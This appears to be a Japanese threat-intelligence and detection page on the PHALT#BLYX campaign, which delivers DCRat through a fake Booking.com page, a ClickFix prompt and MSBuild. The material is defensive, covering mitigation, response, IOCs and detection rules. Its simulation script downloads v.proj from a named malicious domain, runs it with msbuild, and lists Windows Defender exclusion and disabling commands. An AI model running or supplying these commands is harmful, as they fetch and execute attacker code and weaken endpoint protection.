フォローする
概要
このレポートは、ホスピタリティ業界に影響を与える多段階の侵入チェーンを詳細に述べており、それは偽のBooking.comランディングページ、誤解を招くブルースクリーンスタイルのアニメーション、及びPowerShellドロッパーを実行するようにユーザーを説得するClickFixスタイルのプロンプトを組み合わせています。そのドロッパーは、MSBuildプロジェクトファイルを取得し、カスタマイズされたDCRatローダーを実行します。ローダーはWindows Defenderの改ざんを行い、スタートアップの.urlショートカットを使用して持続性をセットし、正当なプロセスにペイロードを注入します。PowerShellやMSBuild.exeのような既存のユーティリティを利用することで、オペレーターは明白なマルウェアの痕跡を減らします。また、チェーン内のロシア語のアーティファクトが帰属手がかりとして記録されています。
調査
Securonixの研究者たちは、「予約キャンセル」リンクを提供するフィッシングメールから悪意のあるドメインへ、そこからmsbuild.exeを見つけ、v.projファイルをダウンロードして実行するPowerShellのワンライナーへマッピングしました。このv.projプロジェクトは複数のアクションを実行します:Windows Defenderの除外を追加し、staxs.exe(DCRatバリアント)を取得し、持続性を持たせるスタートアップ.urlショートカットを作成し、ポート3535を介してコマンドアンドコントロールインフラストラクチャに接続します。そして、ローダーはaspnet_compiler.exeに最終ステージを圧縮して注入し、正当なアクティビティに溶け込むためにプロセスホローイングを使用します。
緩和策
ClickFixスタイルのプロンプトや「このコマンドを実行して修正する」といったソーシャルエンジニアリングを認識するためにユーザーを訓練し、MSBuild.exeの実行を監視および制限します – 特に異常なパスやユーザー駆動のワークフローから呼び出された場合。良好な可視性のためにPowerShellスクリプトブロックのロギングを有効にします。スタートアップフォルダ.urlショートカットの作成とWindows Defenderの除外修正の検出を追加します。ネットワーク層では、特定された悪意のあるドメインへのアウトバウンドトラフィックをブロックし、TCP/3535への不要な通信を厳しく制限または警告を出します。
対応
アクティビティが検出された場合、ホストを隔離してv.proj、staxs.exe、及びあらゆるStartup.urlファイルを含むキーアーティファクトを保存します。無許可のDefenderの除外を削除し、悪意のあるまたは注入されたプロセスを終了し、関連するC2ドメイン/IPをブロックします – 特にポート3535を介したあらゆる通信。潜在的に露出した資格情報をリセットし、フルマルウェアスキャンを実行し、同様のMSBuild駆動の実行とPowerShellコマンドのパターンの環境をスコープします。最終的には、MSBuildの悪用、ClickFixの振る舞い、スタートアップショートカットを通じた持続性に焦点を当てた脅威インテル情報に基づく検出をデプロイし、再発を防ぎます。
“graph TB %% クラス定義 classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff classDef file fill:#e6e6e6 classDef folder fill:#d9ead3 %% ノード u2013 アクション action_phishing[“<b>アクション</b> – <b>T1566.002 スピアフィッシングリンク</b><br/><b>説明</b>: 被害者はBooking.comからのメールを受け取り、偽の予約サイトへの悪意のあるリンクをクリックします。”] class action_phishing action action_user_execution[“<b>アクション</b> – <b>T1204.001 ユーザー実行</b> & <b>T1204.004 悪意のあるコピーu2011ペースト</b><br/><b>説明</b>: 偽のサイトはBSODu2011のようなページを表示し、ユーザーにPowerShellコマンドを実行ダイアログに貼り付けるよう指示します。”] class action_user_execution action action_defense_evasion_exclusions[“<b>アクション</b> – <b>T1562 防御妨害</b> & <b>T1564.012 ファイル/パスの除外</b><br/><b>説明</b>: v.projスクリプトは、Windows Defenderの除外にProgramDataと一般的な実行可能拡張子を追加します。”] class action_defense_evasion_exclusions action action_persistence_shortcut[“<b>アクション</b> – <b>T1547.009 ショートカット変更</b><br/><b>説明</b>: ドロップされた実行ファイルを指すインターネットショートカット(.url)をユーザーu2019sのスタートアップフォルダーに作成します。”] class action_persistence_shortcut action action_process_hollowing[“<b>アクション</b> – <b>T1055.012 プロセスホローイング</b><br/><b>説明</b>: aspnet_compiler.exeに最終的なDCRatペイロードをプロセスホローイングを使用して注入します。”] class action_process_hollowing action action_reflective_loading[“<b>アクション</b> – <b>T1620 リフレクティブコードローディング</b><br/><b>説明</b>: Assembly.Loadを使用して追加のDLLペイロードを反射的にロードします。”] class action_reflective_loading action action_c2_nonstandard_port[“<b>アクション</b> – <b>T1571 非標準ポート</b><br/><b>説明</b>: RATはTCPポート3535を介してC2サーバーと通信します。”] class action_c2_nonstandard_port action action_c2_dynamic_resolution[“<b>アクション</b> – <b>T1568 動的解決</b><br/><b>説明</b>: 実行時に複数のC2ドメイン(例: asj77.com)を解決します。”] class action_c2_dynamic_resolution action action_obfuscation[“<b>アクション</b> – <b>T1027.005 難読化されたファイルまたは情報</b><br/><b>説明</b>: ペイロードは高度に難読化され、静的検出を回避するためにパックされています。”] class action_obfuscation action %% ノード u2013 ツール tool_powershell[“<b>ツール</b> – <b>T1059.001 PowerShell</b><br/><b>説明</b>: 悪意のあるコマンドを実行してMSBuildプロジェクトファイルをダウンロードします。”] class tool_powershell tool tool_msbuild[“<b>ツール</b> – <b>T1127.001 MSBuild</b><br/><b>説明</b>: 信頼された開発者ユーティリティで、悪意のあるv.projファイルをコンパイルおよび実行するために使用されます。”] class tool_msbuild tool tool_aspnet_compiler[“<b>ツール</b> – aspnet_compiler.exe<br/><b>説明</b>: プロセスホローイングの標的である正当な.NETコンパイラです。”] class tool_aspnet_compiler process %% ノード u2013 マルウェア / ファイル malware_vproj[“<b>マルウェア</b> – v.proj(悪意のあるMSBuildプロジェクト)<br/><b>説明</b>: PowerShellによりダウンロードされ、MSBuildによりコンパイルされ、防御の除外を追加し、ペイロードをドロップします。”] class malware_vproj malware malware_dcrat[“<b>マルウェア</b> – DCRatペイロード<br/><b>説明</b>: aspnet_compiler.exeに注入された最終的なリモートアクセス型トロイの木馬です。”] class malware_dcrat malware file_shortcut[“<b>ファイル</b> – スタートアップショートカット(.url)<br/><b>説明</b>: ドロップされたDCRat実行ファイルを指し、ログイン時の自動実行を確保します。”] class file_shortcut file folder_startup[“<b>フォルダー</b> – スタートアップディレクトリ<br/><b>説明</b>: 持続性を引き起こす悪意のあるショートカットを含んでいます。”] class folder_startup folder file_dcrat_exe[“<b>ファイル</b> – ドロップされたDCRat実行ファイル<br/><b>説明</b>: ショートカット起動後に実行されます。”] class file_dcrat_exe file dll_payloads[“<b>ファイル</b> – 追加のDLLペイロード<br/><b>説明</b>: DCRatペイロードにより反射的にロードされます。”] class dll_payloads file port_3535[“<b>ネットワーク</b> – TCPポート3535<br/><b>説明</b>: C2通信で使用されます。”] class port_3535 file domain_asj77[“<b>ネットワーク</b> – asj77.com (C2ドメイン)<br/><b>説明</b>: コマンドとコントロールのために実行時に解決されます。”] class domain_asj77 file %% 接続 u2013 フロー action_phishing u002du002d>|先導| action_user_execution action_user_execution u002du002d>|実行| tool_powershell tool_powershell u002du002d>|ダウンロード| malware_vproj malware_vproj u002du002d>|コンパイルされた| tool_msbuild tool_msbuild u002du002d>|実行| malware_vproj malware_vproj u002du002d>|追加| action_defense_evasion_exclusions action_defense_evasion_exclusions u002du002d>|作成| file_shortcut file_shortcut u002du002d>|配置| folder_startup folder_startup u002du002d>|ロード| file_dcrat_exe malware_vproj u002du002d>|ドロップ| file_dcrat_exe file_dcrat_exe u002du002d>|実行| malware_dcrat malware_dcrat u002du002d>|注入| tool_aspnet_compiler tool_aspnet_compiler u002du002d>|中空化| malware_dcrat malware_dcrat u002du002d>|反射的にロード| dll_payloads malware_dcrat u002du002d>|通信| action_c2_nonstandard_port action_c2_nonstandard_port u002du002d>|使用中| port_3535 malware_dcrat u002du002d>|動的解決| action_c2_dynamic_resolution action_c2_dynamic_resolution u002du002d>|解決済み| domain_asj77 malware_dcrat u002du002d>|難読化| action_obfuscation “
攻撃フロー
検出
Powershell を介したダウンロードまたはアップロード (cmdline 経由)
表示
Windows Defender設定の疑わしい変更 (powershell経由)
表示
持続性の可能性のあるポイント [ASEP – ソフトウェア/NTUSERハイブ] (registry_event経由)
表示
自動起動位置における疑わしいバイナリ/スクリプト (file_event経由)
表示
検出するためのIOC (HashSha512): PHALT#BLYXを分析する: 偽のBSODと信頼されたビルドツールがどのように使用されているか
表示
検出するためのIOC (SourceIP): PHALT#BLYXを分析する: 偽のBSODと信頼されたビルドツールがどのように使用されているか
表示
検出するためのIOC (HashSha256): PHALT#BLYXを分析する: 偽のBSODと信頼されたビルドツールがどのように使用されているか
表示
検出するためのIOC (DestinationIP): PHALT#BLYXを分析する: 偽のBSODと信頼されたビルドツールがどのように使用されているか
表示
PHALT#BLYX 悪意のあるペイロードの実行 MSBuildとプロセスホローイングを使用 [Windowsプロセスの作成]
表示
PHALT#BLYX マルウェアキャンペーン PowerShellとMSBuildを使用した感染 [Windows PowerShell]
表示
シミュレーションの実行
前提条件: テレメトリ & ベースラインのプリフライトチェック合格済み。
根拠: このセクションは、敵の技術戦術 (TTP) の正確な実行を詳細に示しており、検出規則をトリガーするように設計されています。コマンドとナラティブは特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。
-
攻撃のナラティブ & コマンド:
攻撃者は侵害されたエンドポイントでPowerShellセッションを開きます。彼らは最初にシステムのmsbuild.exeバイナリを見つけ、v.projという悪意のあるMSBuildプロジェクトをC:ProgramDataにダウンロードします。攻撃者は直ちにmsbuild.exeを呼び出し、ペイロードを実行し、次のステージをドロップします。最後に、Windows Defenderを改ざんし、持続性を確保するために除外を追加し、リアルタイムモニタリングを無効にします。 -
リグレッションテストスクリプト:
# PHALT#BLYX シミュレーションスクリプト - 検出をトリガーするアクティビティを再現 # -------------------------------------------------------------- # 1. msbuild.exeを探します $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName # 2. 悪意のあるMSBuildプロジェクトをProgramDataにダウンロードします $projUrl = "https://2fa-bns.com/v.proj" $dest = "$env:ProgramDatav.proj" Invoke-WebRequest -Uri $projUrl -OutFile $dest # 3. プロジェクトをmsbuild.exeで実行します & $msb $dest # 4. Windows Defenderの設定を変更します (以下のいずれかがルールを満たします) # 攻撃者の行動をシミュレートするために希望の行をアンコメントします。 # 除外パスを追加 # Add-MpPreference -ExclusionPath "$env:ProgramData" # .exeファイルの除外を追加 # Add-MpPreference -ExclusionExtension ".exe" # .ps1ファイルの除外を追加 # Add-MpPreference -ExclusionExtension ".ps1" # リアルタイム監視を無効にする # Set-MpPreference -DisableRealtimeMonitoring $true -
クリーンアップコマンド:
# ドロップされたプロジェクトファイルを削除 Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue # Windows Defenderのリアルタイム監視を復元 (無効化されている場合) Set-MpPreference -DisableRealtimeMonitoring $false # 追加した除外を削除 (パス除外例) Remove-MpPreference -ExclusionPath "$env:ProgramData" # ペイロードによって作成された残存ファイルを任意で削除 # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue